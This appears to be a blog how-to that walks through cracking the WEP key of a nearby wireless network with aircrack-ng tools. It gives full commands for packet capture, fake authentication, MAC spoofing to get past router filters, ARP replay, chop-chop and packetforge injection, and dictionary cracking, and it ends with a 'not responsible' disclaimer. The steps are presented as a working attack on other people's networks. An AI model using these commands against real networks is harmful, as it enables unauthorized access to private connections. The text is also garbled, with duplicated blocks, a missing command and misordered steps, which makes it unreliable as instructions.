In this part I'll show you to get a wep key.
First, we open a terminal and we type:
sudo aimon-ng start wlan0 (or your interface)
Now it'll appear a message with 4 or 5 process to terminate, but don't pay attention to it, and it'll say also that the monitor mode is enabled on mon0, this will be our interface.
Scan for networks:
sudo airodump-ng mon0
By the time you have more than one network, which has WEP enc., push ctrl+c
Choose one network (WEP)
And type:
sudo airodump-ng --bssid 00:12:59:A7:B9:93 -c 2 -w package (or the name you wish) mon0
BSSID is the MAC ADDRESS of the network, c is the channel and w is the name of the file, mon0 the interface. This window must be open until the end.
The two MAC address of below are clients connected to this network, so it'd be easier.
Open a new tab: File>>Open new tab.
And type for the athentication:
sudo aireplay-ng -1 0 -a MAC of the network -b MAc of the client -h La MAC of your computer mon0
It will appear:
Authentication succesfull :)
Or something like that, if we can't get this message, we try again until succes, but sometimes the router has MAC filter, so we have to change our MAC address:
sudo ifconfig mon0 down
sudo macchanger -m MAC DEL CLIENTE mon0
sudo ifconfig mon0 up
We try again to athenticated and if we got success, we type:
sudo aireplay-ng -3 -b MAC network -c MAc client -h MAC of your computer mon0
It will take a timeso have a sit and relax
When we have more than 20.000 packets, we open a new tab and type:
sudo aircrack-ng package-01.cap
sudo aircrack-ng package-01.cap
f you want to make it faster, you can create a dictionary depending on the network ESSID:
WLAN_XX -----> wlandecypter
ONOXXXX-------> ono4xx
JAZZTEL_XX ------> jazzteldecrypter
(there are more, but this ESSID are the most famous)
If you want to install this programs, there are in the repositories "Wifi", the only thing that we have to do is, search them in the Y-PPA-Manager.
With the dictionary created we type:
sudo aircrack-ng package-01.cap -w where is the dictionary
Well but what would happen if there aren't connected clients? We'll make a chop-chop attack.
We have to do the same until the line:
sudo airodump-ng --bssid00:12:59:A7:B9:93 -c 2 -w captura mon0
We open a new tab and type:
sudo aireplay-ng -1 10 -e ESSID -a NETWORK -h YOUR MAC mon0
Then we open another tab:
sudo aireplay-ng -4 -h YOUR MAC mon0
When it has finished, you'll have 2 files:
*.xor
*.cap
So if that's right type:
*1024 is an example, if it doesn't work, you can try with 300, and then 400, 500... until 1024.
Then when you get a lot of packages, type:
sudo aircrack-ng package-01.cap -w where is the dictionary
Well but what would happen if there aren't connected clients? We'll make a chop-chop attack.
We have to do the same until the line:
sudo airodump-ng --bssid
We open a new tab and type:
sudo aireplay-ng -1 10 -e ESSID -a NETWORK -h YOUR MAC mon0
Then we open another tab:
sudo aireplay-ng -4 -h YOUR MAC mon0
When it has finished, you'll have 2 files:
*.xor
*.cap
So if that's right type:
tcpdump -s 0 -n -e -r FILE.CAP
With this you'll have the IP address, so type:
packetforge-ng -0 -a NETWORK -h YOUR MAC -k IP -y FILE.XOR - w PACKAGE
We have created an ARP file, so:
We have created an ARP file, so:
aireplay-ng -2 -x 1024 -h YOUR MAC -r ARP FILE mon0
*1024 is an example, if it doesn't work, you can try with 300, and then 400, 500... until 1024.
Then when you get a lot of packages, type:
aircrack-ng *.cap
***The dictionary, also works in this case, so create it, and you'll need less IVS.
I'm not responsible of the use of this HOWTO, this is only for learn.
No comments:
Post a Comment